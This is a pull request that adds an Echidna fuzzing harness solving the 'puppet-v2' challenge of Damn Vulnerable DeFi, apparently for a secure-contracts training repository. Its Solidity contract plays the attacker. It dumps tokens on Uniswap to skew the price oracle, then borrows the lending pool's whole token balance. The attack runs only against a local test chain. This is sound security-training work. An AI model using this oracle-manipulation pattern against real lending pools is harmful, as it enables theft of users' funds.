### PR TITLE
Solution for puppet-v2 added

### DIFF
--- a/contracts/puppet-v2/PuppetV2PoolEchidna.sol
+++ b/contracts/puppet-v2/PuppetV2PoolEchidna.sol
@@ -1,0 +1,88 @@
+pragma solidity ^0.7.0;
+
+import "../WETH9.sol";
+
+/*
+Contract interfaces - only functions that are used later on are exposed.
+Argument names aren't necessary, but are added for clarity.
+*/
+interface IERC20 
+{
+    function balanceOf(address account) external returns (uint256);
+    function approve(address spender, uint256 amount) external returns (bool);
+}
+
+interface IPuppetV2Pool
+{
+    function borrow(uint256 borrowAmount) external;
+}
+
+interface IUniswapV2Router02
+{
+    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) 
+        external returns (uint[] memory amounts);
+}
+
+contract PuppetV2PoolEchidna
+{
+    // deployed contracts
+    IERC20 token = IERC20(0x1dC4c1cEFEF38a777b15aA20260a54E584b16C48);
+    IPuppetV2Pool lendingPool = IPuppetV2Pool(0x25B8Fe1DE9dAf8BA351890744FF28cf7dFa8f5e3);
+    WETH9 weth = WETH9(0x1D7022f5B17d2F8B695918FB48fa1089C9f85401);
+    IUniswapV2Router02 uniswapRouter = IUniswapV2Router02(0x0B1ba0af832d7C05fD64161E0Db78E85978E8082);
+
+    uint constant POOL_INITIAL_TOKEN_BALANCE = 1_000_000 ether;
+
+    // contract will receive 20 ETH at the contract creation time
+    constructor() payable
+    {
+        
+    }
+
+    /*
+    The following functions reflect what actions the attacker can make. 
+    Random values provided by Echidna are changed to fit a relevant interval.
+    For example, there is no sense in trying to send more tokens than we actually have.
+    */
+    function swapExactTokensForETH(uint amount) public
+    {
+        amount = _between(amount, 0, token.balanceOf(address(this)));
+        address[] memory path = new address[](2);
+        path[0] = address(token);
+        path[1] = address(weth);
+        token.approve(address(uniswapRouter), amount);
+        uniswapRouter.swapExactTokensForETH(amount, 0, path, address(this), type(uint).max);
+    }
+
+    function borrow() public
+    {
+        uint amount = token.balanceOf(address(lendingPool));
+        weth.approve(address(lendingPool), weth.balanceOf(address(this)));
+        lendingPool.borrow(amount);
+    }
+
+    function getWeth() public
+    {
+        uint amount = address(this).balance;
+        weth.deposit{ value: amount }();
+    }
+
+
+    // utility function; returns a number from the interval [low + 1, high] based on val
+    function _between(uint val, uint low, uint high) internal pure returns (uint)
+    {
+        return low + (val % (high - low + 1)) + 1;
+    }
+
+    // this fails when lendingPool has no tokens left and the attacker has at least POOL_INITIAL_TOKEN_BALANCE tokens
+    function echidna_test_token_balance() public returns (bool)
+    {
+        return token.balanceOf(address(lendingPool)) > 0 || token.balanceOf(address(this)) < POOL_INITIAL_TOKEN_BALANCE;
+    }
+
+    // needed for uniswapRouter.swapExactTokensForETH
+    receive() payable external
+    {
+
+    }
+}

--- a/contracts/puppet-v2/README.md
+++ b/contracts/puppet-v2/README.md
@@ -1,0 +1,30 @@
+# How to run
+1. Go to the project root directory.
+
+2. Run:
+    ```
+    etheno --ganache --ganache-args "--deterministic --gasLimit 10000000" -x contracts/puppet-v2/init.json
+    ```
+    *It will start a `ganache` instance and, when killed, will save the current blockchain state (deployed contracts, transactions made) to `init.json` file, which will be used later.*
+
+3. In a separate terminal, run:
+    ```
+    npx hardhat run contracts/puppet-v2/scripts/deploy.js --network localhost
+    ```
+    *It will do a necessary setup, similar to the original one from DamnVulnerableDeFi challenge. It will also print addresses of deployed contracts, that should be filled in [PuppetV2PoolEchidna.sol](./PuppetV2PoolEchidna.sol).*
+
+4. Fill the addresses of the following variables in [PuppetV2PoolEchidna.sol](./PuppetV2PoolEchidna.sol):
+- token 
+- lendingPool 
+- weth
+- uniswapRouter
+
+    using the values acquired in the step 3.
+
+5. Go back to the terminal where `etheno` is run and press `CTRL+C` in order to kill it.
+
+6. Run:
+    ```
+    echidna-test . --contract PuppetV2PoolEchidna --config puppet-v2.yaml
+    ```
+    in order to start fuzzing.

--- a/contracts/puppet-v2/scripts/deploy.js
+++ b/contracts/puppet-v2/scripts/deploy.js
@@ -1,0 +1,92 @@
+// Setup, almost exactly the same as in the Puppet-v2 challenge.
+// The only difference is that:
+// - we change the attacker's address to a default test contract deployment address in Echidna
+// - we don't send any Ether to that address - we will send it using Echidna config later
+
+const pairJson = require("@uniswap/v2-core/build/UniswapV2Pair.json");
+const factoryJson = require("@uniswap/v2-core/build/UniswapV2Factory.json");
+const routerJson = require("@uniswap/v2-periphery/build/UniswapV2Router02.json");
+
+const { ethers } = require('hardhat');
+const { expect } = require('chai');
+
+async function main() {
+    let deployer;
+
+    // Uniswap v2 exchange will start with 100 tokens and 10 WETH in liquidity
+    const UNISWAP_INITIAL_TOKEN_RESERVE = ethers.utils.parseEther('100');
+    const UNISWAP_INITIAL_WETH_RESERVE = ethers.utils.parseEther('10');
+
+    const ATTACKER_INITIAL_TOKEN_BALANCE = ethers.utils.parseEther('10000');
+    const POOL_INITIAL_TOKEN_BALANCE = ethers.utils.parseEther('1000000');
+    // initialise attacker's address to a default test contract location when Echidna deploys it
+    const ATTACKER_ADDRESS = '0x00a329c0648769a73afac7f9381e08fb43dbea72';
+
+    [deployer] = await ethers.getSigners();
+
+    const UniswapFactoryFactory = new ethers.ContractFactory(factoryJson.abi, factoryJson.bytecode, deployer);
+    const UniswapRouterFactory = new ethers.ContractFactory(routerJson.abi, routerJson.bytecode, deployer);
+    const UniswapPairFactory = new ethers.ContractFactory(pairJson.abi, pairJson.bytecode, deployer);
+
+    // Deploy tokens to be traded
+    this.token = await (await ethers.getContractFactory('DamnValuableToken', deployer)).deploy();
+    this.weth = await (await ethers.getContractFactory('WETH9', deployer)).deploy();
+
+    // Deploy Uniswap Factory and Router
+    this.uniswapFactory = await UniswapFactoryFactory.deploy(ethers.constants.AddressZero);
+    this.uniswapRouter = await UniswapRouterFactory.deploy(
+        this.uniswapFactory.address,
+        this.weth.address
+    );
+
+    // Create Uniswap pair against WETH and add liquidity
+    await this.token.approve(
+        this.uniswapRouter.address,
+        UNISWAP_INITIAL_TOKEN_RESERVE
+    );
+    await this.uniswapRouter.addLiquidityETH(
+        this.token.address,
+        UNISWAP_INITIAL_TOKEN_RESERVE,                              // amountTokenDesired
+        0,                                                          // amountTokenMin
+        0,                                                          // amountETHMin
+        deployer.address,                                           // to
+        (await ethers.provider.getBlock('latest')).timestamp * 2,   // deadline
+        { value: UNISWAP_INITIAL_WETH_RESERVE }
+    );
+    this.uniswapExchange = await UniswapPairFactory.attach(
+        await this.uniswapFactory.getPair(this.token.address, this.weth.address)
+    );
+    expect(await this.uniswapExchange.balanceOf(deployer.address)).to.be.gt('0');
+
+    // Deploy the lending pool
+    this.lendingPool = await (await ethers.getContractFactory('PuppetV2Pool', deployer)).deploy(
+        this.weth.address,
+        this.token.address,
+        this.uniswapExchange.address,
+        this.uniswapFactory.address
+    );
+
+    // Setup initial token balances of pool and attacker account
+    await this.token.transfer(ATTACKER_ADDRESS, ATTACKER_INITIAL_TOKEN_BALANCE);
+    await this.token.transfer(this.lendingPool.address, POOL_INITIAL_TOKEN_BALANCE);
+    
+    // Ensure correct setup of pool.
+    expect(
+        await this.lendingPool.calculateDepositOfWETHRequired(ethers.utils.parseEther('1'))
+    ).to.be.eq(ethers.utils.parseEther('0.3'));
+    expect(
+        await this.lendingPool.calculateDepositOfWETHRequired(POOL_INITIAL_TOKEN_BALANCE)
+    ).to.be.eq(ethers.utils.parseEther('300000'));
+
+    // print addresses of deployed contracts, so that they can be used in a test contract
+    console.log("Deployed successfully.");
+    console.log(`token = ${this.token.address}`);
+    console.log(`lendingPool = ${this.lendingPool.address}`);
+    console.log(`weth = ${this.weth.address}`);
+    console.log(`uniswapRouter = ${this.uniswapRouter.address}`);
+}
+
+main().catch((error) => {
+  console.error(error);
+  process.exitCode = 1;
+});

--- a/puppet-v2.yaml
+++ b/puppet-v2.yaml
@@ -1,0 +1,4 @@
+corpusDir: 'contracts/puppet-v2/corpus'
+initialize: 'contracts/puppet-v2/init.json'
+testLimit: 5000
+balanceContract: 20000000000000000000 # 20 ETH


### PR DESCRIPTION
This PR adds a solution for `puppet-v2` challenge of Damn Vulnerable Defi.

The solution works this way:
- it uses a custom `deploy.js` file for initialization instead of importing source files and instantiating classes
- contracts deployed by `deploy.js` are used in `PuppetV2PoolEchidna`
- `PuppetV2PoolEchidna` contains several helper functions used to interact with `Uniswap`, `WETH`, etc.
- for this reason, `PuppetV2PoolEchidna` contract is treated as the attacker in the challenge

Short justification:
- `deploy.js` is used, since otherwise, it would be necessary to import both `Uniswap`, `DamnValuableToken`, `WETH` and `PuppetV2Pool`, but they use several different versions of `solidity`. In fact, even `Uniswap` itself uses different versions for `core` and for `periphery`. So if I wanted to import all the files in a classic way, it would require migrating the entire `Uniswap` to a common `solidity` version (which is not only fixing imports in each file), which doesn't have too much sense in my opinion.
- `PuppetV2PoolEchidna` is used as the attacker, because some functions require, for instance, approving some tokens that are not available at the contract deployment. `puppet-v2.yaml` uses the `balanceContract` option to supply the contract with the initial attacker's balance.

However, there are two issues:
- even though `echidna` is provided just with 3 functions that it can call, if I allowed it to choose the `amount` in borrow, it wasn't capable of finding the solution. While manually setting the amount in `getWeth` function is not a big deal (it's logical to convert as much `ETH` to `WETH` as possible, since we cannot use plain `ETH` to borrow tokens), if we do the same in `borow`, it is almost like solving the challenge ourselves (that is, we cannot anymore treat `echidna` like  a black box that will just find a solution if we didn't know it already).
- since the test contract is also the attacker, it will not lose gas on transactions (in the original challenge, attacker has to spend some tiny amount of `ETH` to pay for the transactions). But, I do not think that it's a big deal - I just want to state it here for informational purposes.

Even, if you think that it doesn't make sense to create an exercise out of it, I still think the solution has its value, and might be even presented as an example in some new exercise in the `building-secure-contracts` repository as it shows how to handle more complex cases when we are unable to import source files for some reason.

But, if you think that it's suitable for an exercise, I will be happy to add relevant description and tips in `building-secure-contracts`. I may also add a solution for `puppet` challenge if you wish (similar approach will probably be needed, since we don't have `Uniswap V1` sources).

I would be very grateful for any advice regarding the solution itself and the issues I have written about.